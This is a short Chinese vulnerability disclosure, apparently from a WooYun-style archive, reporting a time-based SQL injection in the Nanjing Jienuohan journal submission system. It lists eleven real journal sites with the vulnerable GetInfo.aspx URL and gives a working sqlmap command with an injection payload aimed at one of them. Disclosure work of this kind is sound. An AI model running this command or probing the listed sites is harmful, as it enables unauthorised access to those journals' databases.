### 简要描述:
RT
### 详细说明:
南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞,可获取数据库任意数据... 官网:http://www.025journal.com/
案例:
http://www.cjge-manuscriptcentral.com/tougao/GetInfo.aspx?type=getwkqi&value=1
http://www.lcmzxzz.com/tougao/GetInfo.aspx?type=getwkqi&value=1
http://gaojian.xhnj.com/tougao/GetInfo.aspx?type=getwkqi&value=1
http://xb.cuit.edu.cn/tougao/GetInfo.aspx?type=getwkqi&value=1
http://j.chinatransducers.com/tougao/GetInfo.aspx?type=getwkqi&value=1
http://www.chinaelectrondevices.com/tougao/GetInfo.aspx?type=getwkqi&value=1
http://www.linpi.net/tougao/GetInfo.aspx?type=getwkqi&value=1
http://www.jsnyxb.com/tougao/GetInfo.aspx?type=getwkqi&value=1
http://www.lcsjwk.com/tougao/GetInfo.aspx?type=getwkqi&value=1
http://www.mfskin.net/tougao/GetInfo.aspx?type=getwkqi&value=1
http://www.gjmzyfs.com/tougao/GetInfo.aspx?type=getwkqi&value=1
是延时注入
### 漏洞证明:
我就只演示1个站了
http://www.cjge-manuscriptcentral.com/tougao/GetInfo.aspx?type=getwkqi&value=1
sqlmap.py -u "http://www.cjge-manuscriptcentral.com/tougao/GetInfo.aspx?type=getwkqi&value=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch
[<img src="https://images.seebug.org/upload/201411/19152444b0f314d56067a0b4905915fca25b58f4.png" alt="QQ图片20141119152417.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19152444b0f314d56067a0b4905915fca25b58f4.png)
[<img src="https://images.seebug.org/upload/201411/191524510d0edb7e7998d4a74c87c4009d1e3d82.jpg" alt="QQ图片20141119152436.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191524510d0edb7e7998d4a74c87c4009d1e3d82.jpg)
暂无评论